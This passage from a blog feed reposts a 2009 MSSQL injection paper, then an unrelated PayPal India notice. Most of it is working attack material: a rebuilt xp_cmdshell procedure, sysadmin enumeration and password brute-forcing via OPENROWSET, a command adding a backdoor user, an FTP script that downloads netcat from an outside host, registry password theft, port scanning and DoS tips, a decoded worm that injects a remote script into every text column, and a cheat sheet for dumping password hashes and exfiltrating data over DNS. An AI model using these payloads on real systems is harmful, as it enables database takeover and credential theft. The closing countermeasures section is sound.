to xp_log70.dll, which provides the xp_cmdshell functionality.&lt;br /&gt; If the previous code does not work, it means that the xp_log70.dll has been moved or deleted. In this case we need to inject the following code:&lt;br /&gt;&lt;br /&gt;  CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS&lt;br /&gt;  DECLARE @result int, @OLEResult int, @RunResult int&lt;br /&gt;  DECLARE @ShellID int&lt;br /&gt;  EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT&lt;br /&gt;  IF @OLEResult &amp;lt;&amp;gt; 0 SELECT @result = @OLEResult&lt;br /&gt;  IF @OLEResult &amp;lt;&amp;gt; 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)&lt;br /&gt;  EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait&lt;br /&gt;  IF @OLEResult &amp;lt;&amp;gt; 0 SELECT @result = @OLEResult&lt;br /&gt;  IF @OLEResult &amp;lt;&amp;gt; 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)&lt;br /&gt;  EXECUTE @OLEResult = sp_OADestroy @ShellID&lt;br /&gt;  return @result&lt;br /&gt; &lt;br /&gt; ** Tip **&lt;br /&gt;&lt;br /&gt; [Question] &lt;br /&gt;  Determined that the web application connects to the DB with unprivileged account. &lt;br /&gt; So we can't execute XP_CMDSHELL or access any interesting data ?&lt;br /&gt;&lt;br /&gt; [Answer]   &lt;br /&gt;  It's not the end, First we must enumerate MSSQL user accounts that have system administrator privileges.&lt;br /&gt;&lt;br /&gt; [Code]--------------------------------------------------------------------------------------&lt;br /&gt; http://www.example.com/news.asp?id=1 union all select null,null,name,null,null,null,null from master..syslogins where name not in ('sa') and sysadmin=1;--&lt;br /&gt; [End Code]----------------------------------------------------------------------------------&lt;br /&gt;  &lt;br /&gt; [Result]------------------------------------------------------------------------------------&lt;br /&gt; sa&lt;br /&gt; cwh&lt;br /&gt; example&lt;br /&gt; [End Result]--------------------------------------------------------------------------------&lt;br /&gt;  &lt;br /&gt;  We can use "OPENROWSET" to re-connect to the same database server under each enumerated &lt;br /&gt; sysadmin account and guess passwords. This was automated via a Perl script to do brute-force password guessing through the SQL injection:&lt;br /&gt; &lt;br /&gt; [Code]--------------------------------------------------------------------------------------&lt;br /&gt; http://www.example.com/news.asp?id=1 union select * from openrowset('SQLoledb','server=VICTIMDBNAME;uid=$USER;pwd=$PASS','select * from master..sysusers')--&lt;br /&gt; [End Code]----------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; //Result: Found that "CWH" has a "1234"&lt;br /&gt;     &lt;br /&gt;  Leveraged the "OPENDATASOURCE" function to execute a stored procedure on the database, under the "CWH" system administrator credentials:&lt;br /&gt; &lt;br /&gt; [Code]--------------------------------------------------------------------------------------&lt;br /&gt; http://www.example.com/news.asp?id=1; EXEC opendatasource('SQLoledb','Persist Security Info=False;DataSource=VICTIMDBNAME;UserID=CWH;Password=1234').master&lt;br /&gt; .dbo.xp_cmdshell 'net user hacklol 1234 /add';&lt;br /&gt; [End Code]----------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; //Dirty Attack: use TFTP Netcat and run a reverse shell. Gained Internet access to the internal network.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt; = How about Upload of executables ? =&lt;br /&gt;&lt;br /&gt;  Once we can use xp_cmdshell (either the native one or a custom one), we can easily upload executables on the target DB Server. &lt;br /&gt; A very common choice is netcat.exe, but any trojan will be useful here. If the target is allowed to start FTP connections to the tester's machine, &lt;br /&gt; all that is needed is to inject the following queries: &lt;br /&gt; &lt;br /&gt; exec master..xp_cmdshell 'echo open ftp.tester.org &amp;gt; ftpscript.txt';--&lt;br /&gt; exec master..xp_cmdshell 'echo USER &amp;gt;&amp;gt; ftpscript.txt';-- &lt;br /&gt; exec master..xp_cmdshell 'echo PASS &amp;gt;&amp;gt; ftpscript.txt';--&lt;br /&gt; exec master..xp_cmdshell 'echo bin &amp;gt;&amp;gt; ftpscript.txt';--&lt;br /&gt; exec master..xp_cmdshell 'echo get nc.exe &amp;gt;&amp;gt; ftpscript.txt';--&lt;br /&gt; exec master..xp_cmdshell 'echo quit &amp;gt;&amp;gt; ftpscript.txt';--&lt;br /&gt; exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; = How about Retrieving VNC Password from Registry ? =&lt;br /&gt;&lt;br /&gt; '; declare @out binary(8)&lt;br /&gt; exec master..xp_regread&lt;br /&gt; @rootkey = 'HKEY_LOCAL_MACHINE',&lt;br /&gt; @key = 'SOFTWARE\ORL\WinVNC3\Default',&lt;br /&gt; @value_name='password',&lt;br /&gt; @value = @out output&lt;br /&gt; select cast (@out as bigint) as x into TEMP--&lt;br /&gt; &lt;br /&gt; ' and 1 in (select cast(x as varchar) from temp)--&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; = How about Port Scanning ? =&lt;br /&gt;&lt;br /&gt;  We can use SQL injection vulnerability as a rudimentary IP/Port Scanner of the Internal Network or Internet&lt;br /&gt;&lt;br /&gt; [Code]--------------------------------------------------------------------------------------&lt;br /&gt; http://www.example.com/news.asp?id=1 union select * from openrowset('SQLoledb','uid=sa;pwd=;Network=DBMSSOCN;Address=10.10.10.12,80;timeout=5',&lt;br /&gt; 'select * from table')--&lt;br /&gt; [End Code]----------------------------------------------------------------------------------&lt;br /&gt;  &lt;br /&gt;   This Code will outbound the connection to 10.10.10.12 over port 80. If the port is closed, the timeout (5 seconds) &lt;br /&gt;  in parameter will be consumed and display error message:&lt;br /&gt;&lt;br /&gt;   "SQL Server does not exist or access denied"&lt;br /&gt;&lt;br /&gt;  If port is open, the timeout would not be consumed and error messages will returned:&lt;br /&gt;&lt;br /&gt;   "General network error. Check your network documentation"&lt;br /&gt;   or&lt;br /&gt;   "OLE DB provider 'sqloledb' reported an error. The provider did not give any information about the error."&lt;br /&gt;  &lt;br /&gt;  This technique, We will be able to map open ports on the IP addresses of hosts on the internal network (w00t !!)&lt;br /&gt;&lt;br /&gt;  ** Note **&lt;br /&gt;   This technique can use for Denial of Service (DoS). Just change port to some port such as: FTP (21), and change timeout too high (500).&lt;br /&gt;  It's make many connections to target over FTP service (port 21)&lt;br /&gt;&lt;br /&gt; ++++++++++++++++++++++++++++++++++++++&lt;br /&gt;  [0x04c] - Mass MSSQL Injection Worms&lt;br /&gt; ++++++++++++++++++++++++++++++++++++++&lt;br /&gt;  &lt;br /&gt;  Recently, we came across a particularly interesting type of SQL Injection that, at times, can be quite difficult to clean, &lt;br /&gt; even with the most robust database backup and recovery scheme. This attack is conducted with the help of an Internet robotalso &lt;br /&gt; known as malbotwhich attacks its prospects daily. It is likely that such a malbot fires the series of injection attempts continuously &lt;br /&gt; and conditionally until the malicious script references are sensed on the targeted web pages. There is nothing new in the way that &lt;br /&gt; the following T-SQL is injected. Yet, the generic nature of the script is somewhat interesting to see.&lt;br /&gt;&lt;br /&gt;  &lt;br /&gt; [SQLi worm]---------------------------------------------------------------------------------&lt;br /&gt; ';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C004100520045002000400054002000760061007200630068006100720028003200350035&lt;br /&gt; 0029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F004300&lt;br /&gt; 7500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E&lt;br /&gt; 0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E0073002000&lt;br /&gt; 6200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D0027007500270020&lt;br /&gt; 0061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F0072002000&lt;br /&gt; 62002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D003100AS%20NVARCHAR(4000));EXEC(@S);--&lt;br /&gt; [End SQLi]----------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;  When we decode this SQLi Code with Hex:&lt;br /&gt;&lt;br /&gt; [SQLi Decoded]------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; DECLARE @T VARCHAR(255)&lt;br /&gt; DECLARE @C VARCHAR(255)&lt;br /&gt;&lt;br /&gt; DECLARE Table_Cursor CURSOR FOR&lt;br /&gt; SELECT [A].[Name], [B].[Name]&lt;br /&gt; FROM sysobjects AS [A], syscolumns AS [B]&lt;br /&gt; WHERE [A].[ID] = [B].[ID] AND&lt;br /&gt; &lt;br /&gt; [A].[XType] = 'U' /* Table (User-Defined) */ AND&lt;br /&gt; ([B].[XType] = 99 /* NTEXT */ OR&lt;br /&gt; [B].[XType] = 35 /* TEXT */ OR&lt;br /&gt; [B].[XType] = 231 /* SYSNAME */ OR&lt;br /&gt; [B].[XType] = 167 /* VARCHAR */)&lt;br /&gt; &lt;br /&gt; OPEN Table_Cursor&lt;br /&gt; FETCH NEXT FROM Table_Cursor INTO @T,@C &lt;br /&gt; &lt;br /&gt; WHILE (@@FETCH_STATUS = 0)&lt;br /&gt; &lt;br /&gt; BEGIN&lt;br /&gt; EXEC('UPDATE [' + @T + '] SET [' + @C + '] = RTRIM(CONVERT(VARCHAR, [' + @C + '])) + ''&lt;script src="http://www.fengnima.cn/k.js"&gt;&lt;br /&gt;&lt;/script&gt;''')&lt;br /&gt; FETCH NEXT FROM Table_Cursor INTO @T, @C&lt;br /&gt; END&lt;br /&gt; &lt;br /&gt; CLOSE Table_Cursor&lt;br /&gt; DEALLOCATE Table_Cursor &lt;br /&gt; &lt;br /&gt; [End SQLi]----------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;  What happens as a result? It finds all text fields in the database and adds a link to malicious javascript &lt;br /&gt; &lt;script src="http://www.fengnima.cn/k.js"&gt;&lt;br /&gt;&lt;/script&gt; to each and every one of them which will make your website display them automatically. &lt;br /&gt; So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as &lt;br /&gt; an article ID, product ID, etc) parameter and tried to use that to upload their SQL injection code.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;######################################## &lt;br /&gt; [0x05] - MSSQL Injection Cheat Sheet&lt;br /&gt;########################################&lt;br /&gt; &lt;br /&gt;  ** Some of the queries in the table below can only be run by an admin (SA Privilege). &lt;br /&gt; These are marked with "-- priv" at the end of the query. **&lt;br /&gt;&lt;br /&gt; +---------------+---------------------------------------------------------------------------+&lt;br /&gt; |    Version    | SELECT @@version           |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |   Comments    | SELECT 1 -- comment           |&lt;br /&gt; |               | SELECT /*comment*/1           |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |  | SELECT user_name();           |&lt;br /&gt; |               | SELECT system_user;           |&lt;br /&gt; | Current User | SELECT user;            |&lt;br /&gt; |               | SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID      |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |  List Users   | SELECT name FROM master..syslogins         |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |  | MSSQL2000: SELECT name, password FROM master..sysxlogins -- priv     |&lt;br /&gt; |  |             |&lt;br /&gt; |      |      SELECT name, master.dbo.fn_varbintohexstr(password)            |&lt;br /&gt; |   |      FROM master..sysxlogins -- priv        |&lt;br /&gt; | List Password |             |&lt;br /&gt; |    Hashes | MSSQL2005: SELECT name, password_hash FROM        |&lt;br /&gt; |  |      master.sys.sql_logins -- priv        |&lt;br /&gt; |      |             |&lt;br /&gt; |  |      SELECT name + '-' +         |&lt;br /&gt; |  |      master.sys.fn_varbintohexstr(password_hash)      |&lt;br /&gt; |  |      FROM master.sys.sql_logins -- priv        |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |   | SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin?     |&lt;br /&gt; |  | returns 1 for true, 0 for false, NULL for invalid role.      |&lt;br /&gt; |  | Also try 'bulkadmin', 'systemadmin' and other values.       |&lt;br /&gt; |   List DBA |              |&lt;br /&gt; |   Accounts |             |&lt;br /&gt; |   | SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin?     |&lt;br /&gt; |  | return 1 for true, 0 for false, NULL for invalid role/username.     |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |   Current DB  | SELECT DB_NAME()           |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |     List | SELECT name FROM master..sysdatabases;        |&lt;br /&gt; |   Databases | SELECT DB_NAME(N); -- for N = 0, 1, 2, ...        |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |  | SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE   |       &lt;br /&gt; |  | name = 'mytable'); -- for the current DB only        |&lt;br /&gt; |  |             |&lt;br /&gt; | List Columns | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM  |&lt;br /&gt; |  | master..syscolumns, master..sysobjects WHERE        |&lt;br /&gt; |  | master..syscolumns.id=master..sysobjects.id AND       |&lt;br /&gt; |  | master..sysobjects.name='sometable'; -- list colum names      |&lt;br /&gt; |  | and types for master..sometable         |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |  | SELECT name FROM master..sysobjects WHERE xtype = 'U';      |&lt;br /&gt; |  | (Use xtype = 'V' for views)          |&lt;br /&gt; |  | SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';      |&lt;br /&gt; |  |             |&lt;br /&gt; |  List Tables | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype)     |&lt;br /&gt; |  | FROM master..syscolumns, master..sysobjects WHERE       |&lt;br /&gt; |  | master..syscolumns.id=master..sysobjects.id AND       |&lt;br /&gt; |  | master..sysobjects.name='sometable'; -- list column names and types     |&lt;br /&gt; |  | for master..sometable           |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |   | -- NB: This example works only for the current database.      |&lt;br /&gt; |  | If you wan't to search another db, you need to specify the db name     |&lt;br /&gt; |  Find Tables | (e.g. replace sysobject with mydb..sysobjects).       |&lt;br /&gt; |     From |             |&lt;br /&gt; |  Column Name | SELECT sysobjects.name as tablename, syscolumns.name as columnname     |&lt;br /&gt; |  | FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id     |&lt;br /&gt; |  | WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' --     |&lt;br /&gt; |  | this lists table, column for each column containing the word 'password'   |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |    Select | SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins     |&lt;br /&gt; |    Nth Row | ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row      |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |Select Nth Char| SELECT substring('abcd', 3, 1) -- returns c        |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |  Bitwise AND  | SELECT 6 &amp;amp; 2 -- returns 2          |&lt;br /&gt; |  | SELECT 6 &amp;amp; 1 -- returns 0          |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |  ASCII Value | SELECT char(0x41) -- returns A         |&lt;br /&gt; |   -&amp;gt; Char |             |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; | Char -&amp;gt; ASCII | SELECT ascii('A') - returns 65         |&lt;br /&gt; |     Value |             |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |    Casting    | SELECT CAST('1' as int);          |&lt;br /&gt; |  | SELECT CAST(1 as char)          |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |    String | SELECT 'A' + 'B' - returns AB          |&lt;br /&gt; | Concatenation |             |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; | If Statement  | IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1        |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |Case Statement | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1       |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |Avoiding Quotes| SELECT char(65)+char(66) -- returns AB        |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |  Time Delay   | WAITFOR DELAY '0:0:5' -- pause for 5 seconds        |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |  | declare @host varchar(800); select @host = name FROM master..syslogins;   |&lt;br /&gt; |  | exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini''');     |&lt;br /&gt; |  | -- nonpriv, works on 2000          |&lt;br /&gt; |  |             |&lt;br /&gt; |  | declare @host varchar(800); select @host = name + '-' +      |&lt;br /&gt; |     Make | master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net'     |&lt;br /&gt; | DNS Requests | from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');|&lt;br /&gt; |  | -- priv, works on 2005          |&lt;br /&gt; |  |             |&lt;br /&gt; |  | -- NB: Concatenation is not allowed in calls to these SPs, hence why we   |&lt;br /&gt; |  | have to use @host.  Messy but necessary.        |&lt;br /&gt; |  | -- Also check out theDNS tunnel feature of sqlninja       |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |    Command | EXEC xp_cmdshell 'net user'; -- priv         |&lt;br /&gt; |   Execution   |             |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |     Local | CREATE TABLE mydata (line varchar(8000));        |&lt;br /&gt; |  File Access | BULK INSERT mydata FROM 'c:\boot.ini';        |&lt;br /&gt; |  | DROP TABLE mydata;           |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; | Hostname, IP  | SELECT HOST_NAME()           |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; | Create Users  | EXEC sp_addlogin 'user', 'pass'; -- priv        |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; |  Drop Users   | EXEC sp_droplogin 'user'; -- priv         |&lt;br /&gt; |---------------|---------------------------------------------------------------------------|&lt;br /&gt; | Make User DBA | EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; -- priv     |&lt;br /&gt; +---------------+---------------------------------------------------------------------------+&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;########################################&lt;br /&gt; [0x06] - SQL Injection Countermeasures&lt;br /&gt;########################################&lt;br /&gt;&lt;br /&gt; Main cause of SQL injection vulnerability is input validation. Many web developers do not provide&lt;br /&gt;proper mechanism in order to sanitize any form of input. So, attackers take advantage of this point and gain access&lt;br /&gt;to many databases. There are solutions to prevent SQL injection vulnerability.&lt;br /&gt;&lt;br /&gt; - Use whilelist input: because we cannot know all of bad inputs, so the efficient way is to allow only our known-valid input&lt;br /&gt; - Check input type: in some cases, attackers inject string into numeric input field or inject numeric into string input field, &lt;br /&gt;   these may cause SQL injection vulnerability&lt;br /&gt; - Escape database metacharacters: use / in order to escape database metacharacters by prepending / in front of metacharaters.&lt;br /&gt; - Don't ignore any ways of input: attackers can manipulate input to exploit SQL vulnerabilities, so you must not care only query string but also headers, &lt;br /&gt;   cookies and form fields as well&lt;br /&gt; - Use Parameterized Queries: MSSQL provides API for handling inputs which can help us to prevent SQL injection. &lt;br /&gt;   This mechanism is called "Parameterized Queries".&lt;br /&gt;&lt;br /&gt;   The following two code samples illustrate the difference between an unsafe query dynamically constructed out of &lt;br /&gt;  user data, and its safe parameterized counterpart. &lt;br /&gt; &lt;br /&gt;   In the first, the user-supplied name parameter is embeded directly into a SQL statement, leaving the &lt;br /&gt;  application vulnerable to SQL injection:&lt;br /&gt;&lt;br /&gt;   //define the query structure&lt;br /&gt;   string queryText = "select ename,sak from emp where ename ='";&lt;br /&gt;  &lt;br /&gt;   //concatenate the user-supplied name&lt;br /&gt;   queryText += request.getParameter("name");&lt;br /&gt;   queryText += "'";&lt;br /&gt;  &lt;br /&gt;   //execute the query&lt;br /&gt;   stmt = con.createStatement();&lt;br /&gt;   rs = stmt.executeQuery(queryText);&lt;br /&gt; &lt;br /&gt;   In the second example, the query structure is defined using a question mark as a placeholder &lt;br /&gt;  for the user-supplied parameter. The prepareStatement method is invoked to interpret this, and fix the structure &lt;br /&gt;  of the query that is to be executed. Only then is the setString method used to specify the actual value of &lt;br /&gt;  the parameter. Because the query's structure has already been fixed, this value can contain any data at all, &lt;br /&gt;  without affecting the structure. The query is then executed safely:&lt;br /&gt;&lt;br /&gt;   //define the query structure&lt;br /&gt;   String queryText = "select ename,sal from emp where ename = ?";&lt;br /&gt;  &lt;br /&gt;   //prepare the statement through DB connection "con"&lt;br /&gt;   stmt = con.prepareStatement(queryText);&lt;br /&gt;  &lt;br /&gt;   //add the user input to variable 1 (at the first ? placeholder)&lt;br /&gt;   stmt.setSting(1, request.getParameter("name"));&lt;br /&gt;  &lt;br /&gt;   //execute the query&lt;br /&gt;   rs = stmt.executeQuery();&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#####################&lt;br /&gt; [0x07] - References&lt;br /&gt;#####################&lt;br /&gt;&lt;br /&gt;[1] Error based SQL injection - a true story: AnalyseR&lt;br /&gt;[2] Advanced SQL Injection In SQL Server Applications: Chris Anley&lt;br /&gt;[3] ASCII Encoded/Binary String Automated SQL Injection Attack: Michael Zino&lt;br /&gt;[4] http://pentestmonkey.net&lt;br /&gt;[5] http://www.owasp.org&lt;br /&gt;[6] http://www.milw0rm.com&lt;br /&gt;&lt;br /&gt;####################&lt;br /&gt; [0x08] - Greetz To&lt;br /&gt;####################&lt;br /&gt; &lt;br /&gt;Greetz     : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK&lt;br /&gt;Special Thx : asylu3, str0ke, citec.us, milw0rm.com&lt;br /&gt;&lt;br /&gt;    ----------------------------------------------------&lt;br /&gt; This paper is written for Educational purpose only. The authors are not responsible for any damage &lt;br /&gt; originating from using this paper in wrong objective. If you want to use this knowledge with other person systems, &lt;br /&gt;    you must request for consent from system owner before&lt;br /&gt;    ----------------------------------------------------&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2009-01-29]&lt;/a&gt;&lt;/stdin&gt;&lt;/stdin&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-5943533768691944301?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Y3G5xaxDjrK4s6K7JPF1HjF9f9I/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Y3G5xaxDjrK4s6K7JPF1HjF9f9I/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Y3G5xaxDjrK4s6K7JPF1HjF9f9I/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Y3G5xaxDjrK4s6K7JPF1HjF9f9I/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/A_gWy-_iF78" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/A_gWy-_iF78/sql-injection-tutorial-with-full.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/03/sql-injection-tutorial-with-full.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-2727490048401543181</guid><pubDate>Thu, 03 Mar 2011 19:14:00 +0000</pubDate><atom:updated>2011-03-03T11:14:36.652-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">notification</category><category domain="http://www.blogger.com/atom/ns#">tours</category><category domain="http://www.blogger.com/atom/ns#">India</category><category domain="http://www.blogger.com/atom/ns#">credit</category><category domain="http://www.blogger.com/atom/ns#">exchange</category><category domain="http://www.blogger.com/atom/ns#">paypal</category><category domain="http://www.blogger.com/atom/ns#">money</category><category domain="http://www.blogger.com/atom/ns#">budget</category><category domain="http://www.blogger.com/atom/ns#">RBI</category><category domain="http://www.blogger.com/atom/ns#">card</category><title>Notification for PayPal users in India</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;b&gt;With effect from 1 March 2011, you are required to comply with the  requirements set out in the notification of the Reserve Bank of India  governing the processing and settlement of export-related receipts  facilitated by online payment gateways ("RBI Guidelines"). &lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img alt="http://www.androidguys.com/wp-content/uploads/2010/05/paypal-logo.jpeg" height="400" src="http://www.androidguys.com/wp-content/uploads/2010/05/paypal-logo.jpeg" width="373" /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;b&gt;1.&lt;span style="color: #840084;"&gt;Any  balance in and all future payments into your PayPal account may not be  used to buy goods or services and must be transferred to your bank  account in India within 7 days from the receipt of confirmation from the  buyer in respect of the goods or services; and&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;2.&lt;span style="color: red;"&gt;Export-related payments for goods and services into your PayPal account may not exceed US$500 per transaction.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;We seek your understanding as we continue to employ our best efforts to comply with the RBI Guidelines in a timely manner.&lt;br /&gt;&lt;br /&gt;We  regret any inconvenience caused to you and hope the advance notice will  enable you to plan your future use of our services accordingly.&lt;br /&gt;&lt;br /&gt;Sincerely,&lt;br /&gt;&lt;br /&gt;The PayPal Team&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;red]Frequently Asked Questions:&lt;br /&gt;&lt;br /&gt;Q: Why will PayPal not allow me to receive more than US$500?&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;Starting  1 March, 2011, PayPal customers in India will not be allowed to receive  payments for any export-related goods or services for an amount  exceeding US$500 per transaction. This change is to ensure that we  continue to comply with the RBI Guidelines.&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;b&gt;&lt;br /&gt;Q: Why will PayPal not allow me to keep money in my PayPal balance?&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;Starting  1 March, 2011, PayPal customers in India will not be able to keep money  in their PayPal account balance. Instead, all money received into a  PayPal account must be transferred to a customer's India bank account  within 7 days from the receipt of confirmation from the buyer in respect  of the good or services. This change is to ensure that we continue to  comply with the RBI Guidelines.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Q: Will my customers be able to complete their checkout with their PayPal account balance?&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;br /&gt;We're  glad that you offer PayPal to your customers. Unfortunately, we will  not allow customers in India to send money from their PayPal account  balance starting 1 March, 2011. This means that your customers will need  to link a credit card to their account in before sending you money with  PayPal. This change is to ensure that we continue to comply with the  RBI Guidelines.&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Q: The customers on my website are not able to complete purchase or pay via PayPal. Why?&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;br /&gt;Starting 1 March, 2011, PayPal customers in India will not be allowed  to receive payments for any export-related goods or services for an  amount exceeding US$500 per transaction. If you are listing products  greater than US$500 per transaction then you may need to seek  alternative methods of payment. This change is to ensure that we  continue to comply with the RBI Guidelines.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Q: What is meant by receipt of confirmation from the buyer in respect of goods and services?&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;br /&gt;As an exporter of products or services abroad, you need to ensure that  your buyer has received the product or services as per specifications  set out on your website. As an exporter of goods, you may withdraw the  balance to your bank account in India upon reasonable consideration of  shipping time and other clearances such as excise and customs for the  destination country. As an exporter of services, you may withdraw the  balance to your bank account in India upon receipt of payment from your  buyer into your PayPal account.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Q: I am unable to find the Mass Payment feature in your website. Why?&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;br /&gt;In order to comply with the RBI Guidelines, PayPal customers in India  will not be allowed to use the Mass Payment feature. In accordance with  the regulations, we will be disallowing users from using any balance in  and all future payments into their PayPal accounts to buy goods or  services. All users will have to use their credit cards for making such  payments. Since our Mass Payment feature supports only payment from  balance and not credit cards, we will be discontinuing this feature.  However, users will be able to receive Mass Payment into their PayPal  account.&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;b&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;b&gt;&lt;span style="color: red;"&gt; &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div 